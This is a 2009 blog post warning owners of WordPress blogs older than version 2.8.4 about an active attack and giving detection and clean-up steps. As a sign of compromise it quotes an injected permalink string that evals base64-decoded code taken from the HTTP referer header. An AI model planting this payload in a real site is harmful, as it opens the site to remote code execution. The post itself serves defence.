Self Hosted Wordpress Blogs Under Attack

Abhinav Kaiser | Sep 05, 2009 | 1 comment

Beware! If you are running a self hosted Wordpress blog that is not upgraded to version 2.8.4, chances are that your blog has already been hacked or will be hacked very soon. So, if you haven’t already, buck up and do the necessities.

Lorelle on Wordpress provides this information that the world of Wordpress prior to 2.8.4 will come crashing down if proper care is not taken. Here’s an excerpt:

WordPress NewsOtto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!

How Do I Know If My Site Has Already Been Attacked?

There are two clues that your WordPress site has been attacked.

There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”

The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.

WordPress.com blogs are not impacted as they are up-to-date. Only versions prior to WordPress 2.8.4 are impacted.

To Prevent Your WordPress Blog from Attack

To prevent this form of attack, update your WordPress site IMMEDIATELY to the latest version. Change ALL passwords to a strong password immediately, including WordPress blog access for all users, database, FTP, control panels, everything.

See the articles below for more helpful information on how to harden and protect your WordPress blog.

If Your WordPress Blog Has Been Attacked

If your site has already been attacked, it appears that the hack attacks the database, going deep. We’re looking for solutions, but the easiest appears to be to export all your content with the built-in XML WordPress export (pre 2.1 versions, try the WordPress-to-WordPress Import WordPress Plugin) and literally remove your WordPress installation totally (save images and general files). DO NOT EXPORT YOUR DATABASE! Install the latest version of WordPress and add the “clean” backup of your WordPress Theme, then import the XML export. The export will contain your posts, Pages, and comments, and hopefully no other hacked code.

“How To Completely Clean Your Hacked WordPress Installation” by Smackdown is a good article on how to reinstall WordPress after being hacked, but take care to keep your export limited to the post content and comments (and Pages), not the entire database as the hack goes into the database.

via

Related posts:

  1. Migrating from Wordpress to Joomla
  2. Troubleshooting the Wordpress Blank Page
  3. WordPress for iPhone is here
  4. 2010 is the year of open source design for WordPress
  5. Of Wordpress Upgrades and Plugin Compatibility – you do not have sufficient permissions to access this page

Filed Under: Blogging

Tags:

About the Author

Abhinav Kaiser is a certified project manager (PMP) and an expert in IT service management. He has been writing on several blogs for over 6 years and has been a source of inspiration for many budding bloggers. He recently started a blog, Abhinav PMP and his latest baby in the works needs special mention - Success Mantras. Click here if you need to get in touch.

Comments (1)

Trackback URL | Comments RSS Feed

  1. wordpress forum says:
    May 4, 2010 at 10:18 am

    This is very true, I have never updated my blog for over a year due to theme compatibility issues, then one day someone deleted all of my post that i posted for almost one year.

Leave a Reply




If you want a picture to show with your comment, go get a Gravatar.